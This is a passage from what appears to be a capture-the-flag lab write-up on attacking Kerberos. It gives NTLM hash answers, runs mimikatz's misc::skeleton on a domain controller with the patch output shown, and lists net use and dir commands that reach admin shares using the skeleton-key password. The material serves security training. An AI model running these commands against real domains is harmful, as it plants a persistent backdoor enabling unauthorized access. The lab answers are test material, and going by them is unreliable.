Default Salt : WIN-G83IJFV2N03Administrator
...
What is the SQLService NTLM Hash?¶
cd40c9ed96265531b21fc5b1dafcfb0a
What is the Administrator NTLM Hash?¶
2777b7fec870e04dda00cd7260f7bee6
Task 8 Kerberos Backdoors w/ mimikatz¶
Installing the Skeleton Key - Mimikatz¶
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz # misc::skeleton
[KDC] data
[KDC] struct
[KDC] keys patch OK
[RC4] functions
[RC4] init patch OK
[RC4] decrypt patch OK
Accessing the forest¶
This is only PoC, we can't do it on this machine
net use c:\\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz
dir \\Desktop-1\c$ /user:Machine1 mimikatz
I understand how to implant a skeleton key into a domain controller with mimikatz¶
No answer needed
Task 9 Conclusion¶
I Understand the Basics of Attacking Kerberos¶
No answer needed
References¶
https://github.com/GhostPack/Rubeus